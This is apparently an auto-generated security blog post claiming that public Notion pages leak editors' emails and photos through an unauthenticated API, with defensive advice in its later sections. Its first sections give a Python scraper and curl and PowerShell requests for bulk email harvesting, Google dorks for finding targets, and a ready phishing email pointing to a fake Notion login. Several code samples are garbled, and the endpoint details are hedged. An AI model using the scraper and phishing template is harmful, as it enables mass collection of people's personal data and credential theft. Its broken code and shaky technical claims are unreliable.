Notion’s Silent Data Leak: How Public Pages Expose Your Team’s Emails & Photos (No Auth Required) + Video

Listen to this Post

Featured Image

Introduction:

Public collaboration pages on Notion have become a hidden vector for data exposure. Recent findings reveal that any public Notion page silently leaks the full names, email addresses, and profile photos of every user who has ever edited that page—without requiring authentication, cookies, or access tokens. This flaw enables attackers to scrape thousands of company wikis and personal pages, turning metadata into ammunition for targeted phishing and social engineering campaigns.

Learning Objectives:

  • Identify how Notion’s public page configuration exposes editor metadata via unauthenticated API calls.
  • Build OSINT scraping scripts to enumerate exposed emails and profile photos from public Notion pages.
  • Implement defensive mitigations, including access reviews, email filtering, and API security hardening for collaboration platforms.

You Should Know:

  1. The Vulnerability Deep Dive: How Notion Exposes Editor Data

Notion’s architecture loads editor information dynamically from an internal API endpoint. When you visit any public page (e.g., `https://www.notion.so/company/public-page`), the browser makes a request to `https://www.notion.so/api/v3/getPublicPageData` or similar endpoints that return a JSON blob containing an `editors` array. This array includes each editor’s name, email, and `profilePhoto` URL—all accessible without any session token.

Step‑by‑step guide to verify the leak:

  1. Open a public Notion page in Chrome or Firefox.
  2. Press `F12` to open Developer Tools → Network tab.

3. Refresh the page and filter by `Fetch/XHR`.

  1. Look for requests containing getPublicPageData, loadPageChunk, or getRecordValues.
  2. Click the request → Preview tab → expand `recordMap` → `block` → `editor` metadata.

Linux/macOS command to simulate the request:

curl -s 'https://www.notion.so/api/v3/getPublicPageData' \
-H 'content-type: application/json' \
--data-raw '{"pageId":"YOUR_PUBLIC_PAGE_ID"}' | jq '.recordMap.notion.user'

Replace `YOUR_PUBLIC_PAGE_ID` with the 32-character ID from the page URL. The `jq` filter extracts all user objects, revealing emails and names.

Windows PowerShell alternative:

$body = @{pageId="YOUR_PUBLIC_PAGE_ID"} | ConvertTo-Json
Invoke-RestMethod -Uri "https://www.notion.so/api/v3/getPublicPageData" -Method Post -Body $body -ContentType "application/json" | ConvertTo-Json -Depth 10

2. OSINT Harvesting with Python: Building a Scraper

Attackers can automate the extraction of thousands of emails using a simple Python script. This script iterates over a list of public Notion page URLs and parses the embedded JSON.

Python script example (educational use only):

import requests
import json
import re

def extract_editors(page_id):
url = "https://www.notion.so/api/v3/getPublicPageData"
payload = {"pageId": page_id}
headers = {"Content-Type": "application/json"}
r = requests.post(url, json=payload, headers=headers)
if r.status_code == 200:
data = r.json()
users = data.get("recordMap", {}).get("notion", {}).get("user", {})
for uid, info in users.items():
email = info.get("email", "N/A")
name = info.get("name", "N/A")
print(f"Name: {name}, Email: {email}")
else:
print(f"Failed: {page_id}")

Example usage
page_ids = ["abc123def456", "789ghi012jkl"]  extracted from public page URLs
for pid in page_ids:
extract_editors(pid)

How to obtain page IDs: From any public Notion URL like https://www.notion.so/MyPage-1234567890ab`, the ID is the trailing alphanumeric string (1234567890ab`). Attackers can use Google dorks such as `site:notion.so “public” “wiki”` to discover thousands of indexable pages.

Ethical note: Only test this on your own Notion pages or with explicit permission. Unauthorized scraping violates Notion’s Terms of Service.

3. Phishing Amplification: Turning Leaked Emails into Campaigns

Exposed emails combined with editor names and profile photos allow attackers to craft highly convincing spear‑phishing emails. For example, an attacker can impersonate a Notion collaborator by using the stolen profile photo and sending an email that appears to come from a legitimate editor.

Example phishing email:

From: [Real Editor Name] <a href="mailto:fake@attacker.com">fake@attacker.com</a>
Subject: Urgent: Update to our Notion page "Project Alpha"

Hi Team,

I just noticed an unauthorized change on our public Notion page. Please click the link below to verify your credentials and revert the change.

[Malicious Link: https://fake-notion-login.com]

Thanks,
[Editor Name]

Mitigation commands for email filtering (Linux with SpamAssassin):

 Add custom rule to flag emails mentioning "Notion" from unknown domains
echo "header __NOTION_PHISH Subject =~ /Notion/i" >> /etc/mail/spamassassin/local.cf
echo "describe NOTION_PHISH Possible Notion-themed phishing" >> /etc/mail/spamassassin/local.cf
echo "score NOTION_PHISH 3.0" >> /etc/mail/spamassassin/local.cf
systemctl restart spamassassin

Windows Defender anti‑phishing policy (PowerShell as Admin):

Set-MalwareFilterPolicy -Identity Default -EnableInternalSenderProtection $true
Set-PhishFilterPolicy -Identity Default -EnableMailboxIntelligence $true -EnableSimilarUsersSafetyTips $true

4. Cloud Hardening for Collaboration Platforms

Organizations using Notion for public documentation must assume that every editor’s email will be leaked. Proactive hardening reduces the blast radius.

Step‑by‑step guide for Notion workspace admins:

1. Audit all public pages:

Use Notion’s “Settings & Members” → “Security” → “Public pages” to list every publicly shared page.
Linux one‑liner to export page IDs from audit log (if using Notion API):

curl -X POST https://api.notion.com/v1/search -H "Authorization: Bearer $NOTION_TOKEN" -H "Notion-Version: 2022-06-28" | jq '.results[].id'

2. Restrict editing permissions on public pages:

Change public pages to “Can view” only. No editor should be added directly to a public page. Instead, maintain a private master page and publish a read‑only snapshot.

  1. Use a dedicated “public” email alias for editors:
    Create a generic email like `[email protected]` and add that as the only editor on public pages. Notion allows any email address to be added as a member—use a distribution list.

4. Remove old editors:

Regularly review and remove departed employees from all workspaces. Use the Notion API to list workspace members:

curl "https://api.notion.com/v1/users" -H "Authorization: Bearer $NOTION_TOKEN" | jq '.results[] | {name: .name, email: .person.email}'

5. Alternative: private sharing with expiring links

Instead of fully public pages, use “Share to web” with a password or expiring links where possible. Notion supports expiring share links for Plus and Business plans.

5. API Security Lessons: Why Metadata Matters

The Notion leak underscores a broader API security antipattern: exposing user metadata on unauthenticated endpoints. Many SaaS platforms separate “content” (public) from “metadata” (private), but Notion failed to make that distinction.

Testing your own APIs for metadata leakage (Linux with curl and jq):

 Check if your API returns user emails on a public endpoint
curl -s https://your-api.com/public/post/123 | jq '.author.email'
 If email appears, that's a leak.

Mitigation: Implement metadata stripping for public responses.

Example Python middleware using Flask:

from flask import jsonify

def public_response(data):
 Remove sensitive fields recursively
if isinstance(data, dict):
data.pop('email', None)
data.pop('phone', None)
for k, v in data.items():
data[bash] = public_response(v)
return data

@app.route('/public/page/<id>')
def public_page(id):
page = get_page(id)
return jsonify(public_response(page))

API gateway rule (AWS WAF) to block email patterns in responses:

{
"Name": "BlockEmailLeak",
"Priority": 0,
"Action": {"Block": {}},
"VisibilityConfig": {...},
"Statement": {
"RegexMatchStatement": {
"RegexString": "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}",
"FieldToMatch": {"Body": {}},
"TextTransformations": [{"Type": "NONE"}]
}
}
}

6. Defensive Strategies for Enterprises

Enterprises should assume that any employee who has ever edited a public Notion page has had their email and photo scraped. Immediate defensive actions include:

Step‑by‑step internal response plan:

  1. Discover exposure: Use the `curl` command from section 1 on your own public pages to confirm leaked emails.
  2. Notify affected editors: Send an internal alert explaining the exposure and instructing them to expect phishing attempts.
  3. Enable multi‑factor authentication (MFA) on all corporate email accounts. Attackers with emails can try password spraying.
  4. Deploy custom detection rules in SIEM. Example Splunk query:
    index=email sourcetype=o365 | search subject="Notion" OR body="Notion" | stats count by from, to, subject
    
  5. Use OSINT monitoring services (e.g., HaveIBeenPwned for enterprise) to alert if corporate emails appear in new data dumps.

Linux command to check if your domain’s emails have been exposed in known breaches (using `curl` and `haveibeenpwned.com` API):

curl -H "hibp-api-key: YOUR_KEY" "https://haveibeenpwned.com/api/v3/breachedaccount/[email protected]"

7. Command-Line Forensics: Detecting Exposure in Real Time

Security teams can proactively scan public Notion pages related to their organization using simple command-line tools.

Extract all emails from a public Notion page with `curl` + grep:

curl -s "https://www.notion.so/company/engineering-wiki-123abc" | grep -oE '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]{2,}' | sort -u

Windows PowerShell equivalent:

(Invoke-WebRequest -Uri "https://www.notion.so/company/engineering-wiki-123abc").Content | Select-String -Pattern '\b[A-Za-z0-9.<em>%+-]+@[A-Za-z0-9.-]+.[A-Za-z]{2,}\b' -AllMatches | ForEach-Object {$</em>.Matches.Value} | Sort-Object -Unique

Automated monitoring cron job (Linux):

!/bin/bash
 /etc/cron.daily/notion_scanner
PAGES=("https://www.notion.so/company/page1" "https://www.notion.so/company/page2")
for URL in "${PAGES[@]}"; do
curl -s "$URL" | grep -oE '[a-zA-Z0-9._%+-]+@company.com' >> /var/log/notion_exposed_emails.log
done
 Alert if any new emails found
if [ -s /var/log/notion_exposed_emails.log ]; then
mail -s "Notion email leak detected" [email protected] < /var/log/notion_exposed_emails.log
fi

What Undercode Say:

  • Key Takeaway 1: “Public” does not mean “anonymous.” Collaboration platforms routinely expose metadata that attackers can weaponize without breaking any authentication.
  • Key Takeaway 2: API security must treat metadata (emails, profile photos, edit history) as sensitive as primary content. Rate limiting, authentication, and output filtering are not optional.

Analysis: The Notion vulnerability is a textbook case of feature creep—convenience (showing who edited a page) became a privacy disaster when exposed on public routes. Most organizations rely on Notion for internal wikis and customer documentation, yet few realize that every editor’s email is broadcasted to the world. Attackers are already scraping these pages, building targeted lists for CEO fraud and vendor invoice scams. The real danger is not the leak itself but the delayed response: by the time companies discover the exposure, their employees have been on phishing radars for months. Mitigation requires a shift from reactive patching to proactive metadata hygiene, including mandatory reviews of all “public” sharing settings and the use of dedicated service accounts for public content.

Prediction:

Regulators will soon classify unauthenticated metadata exposure as a breach under GDPR and CCPA, because emails combined with names are “personal data.” Expect class-action lawsuits against Notion and similar SaaS providers (e.g., Coda, Monday.com) that fail to isolate public vs. private user information. Within 12 months, major collaboration platforms will introduce “privacy-safe public mode” that strips all editor metadata or replaces real emails with anonymized hashes. Security vendors will release browser extensions that detect and block Notion metadata scraping in real time. Organizations that ignore this issue will face increased phishing success rates, potentially leading to ransomware footholds—all because a product manager prioritized “collaboration transparency” over data protection.

▶️ Related Video (76% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Notion Phishing – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky